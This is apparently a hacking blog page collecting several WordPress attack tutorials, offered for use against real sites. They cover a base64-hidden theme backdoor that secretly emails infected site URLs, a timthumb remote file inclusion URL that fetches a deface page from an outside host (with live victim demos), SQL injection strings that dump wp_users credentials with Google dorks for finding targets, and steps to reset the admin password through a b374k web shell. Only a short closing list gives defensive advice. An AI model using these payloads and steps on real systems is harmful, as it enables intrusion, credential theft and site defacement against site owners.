Showing posts with label WORDPRESS SITE HACK. Show all posts
Showing posts with label WORDPRESS SITE HACK. Show all posts

How to hack Wordpress site?!!!

 We will continue our hacking wordpress tutorial series, today title is Hacking WordPress: Send Email Secretly About Website Information. This tutorial was highly related with our last tutorial about 

As I already stated on the last wordpress hacking tutorial, "Do not think too complex about this tutorial, because we will learn this with approach to social engineering technique".
If last time we talk about how to add administrator user secretly when an attacker spread the malicious premium wordpress themes, now the attacker need to know the website that already used the malicious wordpress themes.
Requirements:
1. Understand PHP,
2. Know wordpress function,
3. Script to send email secretly (download below).

Step by step Hacking WordPress: Send Email Secretly About Website Information:


1. We want to know about the wordpress user information of a user. Let see the following script:
Hacking WordPress: Send Email Secretly About Website Information
2. The script on step one if executed will show the details of active wordpress user (logged in). We will try to execute this script on my local wordpress server, and here is the results:
Hacking WordPress: Send Email Secretly About Website Information
We can see from the picture above the username and password hash of the wordpress user.
3. Even we know the username and password hash, but we still need time to crack the password hash to get the plain password from the user.
On our last hacking tutorial about WordPress hacking tutorials to add administrator user secretly, we can addadministrator secretly by spreading the malicious themes, but the problem is: "how do we know who alreadydownload the malicious wordpress themes?"
4. From the problem in step three, we will use the method to combine this tutorial WordPress hacking tutorials to add administrator user secretly and send the URL address of the infected website by inserting the following script.
Hacking WordPress: Send Email Secretly About Website Information
Download the script (for subscribers only):
Download
5. When saw this email address, it's way too plain :-) how if we encode it using base64_encode PHP function, and here is the result.
Hacking WordPress: Send Email Secretly About Website Information
6. The script will send email secretly to the attacker containing the wordpress URL when victim logged in and browse his/her wordpress website.
Here is the video for this tutorial :
Conclusion:
1. Download the wordpress themes only from the trusted source.
2. Buy was better than "free download:-D
3. Usually this kind of attack you can find on a premium wordpress themes (nulled edition or warez), make sure you check the source code one by one the themes to minimize the attack.
you can give a try to find the strings below in your themes code (especially the nulled and warez edition) to check whether it has a malicious code or not.
base64_encode (most attacker use base64 encoding)
http:// (check the URL that going somewhere),
anyone want to add?

Wordpress timthumb remote file upload Vulnerability

In this Vulnerability you can include any file (every format allowed)on Vulnerable wrdpress website
this bug known as "timthumb.php" exploit
exploithttp://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat
example :  http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.devilscafe.in/deface.html
after acessing this url that file will upload on website remotly on website
to view your uploaded file goto :
http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere
(file will upload with a random name like fe0555b78d04cb3c76cff7e10cf05b77, check last file to view your file)
live Demo : http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://pastehtml.com/view/btuwhb6nl.html
Result :http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/1dc2c9907ce70a6ed472bbb1cad3cf71.html

Wordpress SQL Injection Hacks


images (65×123)


there are Million of  sites which hosted on wordpress.Its new Tutorial on wordpress
hacking with SQL injections, lets see

How To use it ? 
For Example 
1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* 
Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" 
Now Go to Google.com and type your modified dork and see the serach result the search result will be like this for dork http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=        Reomve the words after iframe.php and put ur SQl injection here ... 
now the url will be http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... 
Crash the password using md5 decoding Tools and login here http://site.com/wp-login.php 
Note : The Process is same for all Injections is same ..

How To Gain Admin acess on wordpress websites after uploading shell



if you want acess in same site where you uploaded shell then simply edit wp-config.php

wp1.jpg (407×250)

Copy MySQL Database's username and password from wp-config.php
Now Goto MYSQL option in b374k shell 
and paste username and password there

wp2.jpg (456×233)

Now Click on Go
Now you wil get 2 tables There
click on table below information_schema

wp3.jpg (352×124)

click on 2 table and find wp_users columns there
and click on wp_users

wp5.jpg (555×186)

you'll get admin username password and email there,
but its Hard to crack wp password so we need to reset it with own hash !
simply put there password reset Query in Black Box
UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin';
and Click On Go
you'll get a Reply 
UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin'; [ok]
its means Password chnaged sucessfully !

wp6.jpg (474×175)

Now goto : http://www.site.com/wp-admin and login there =)

wp1.jpg (369×358)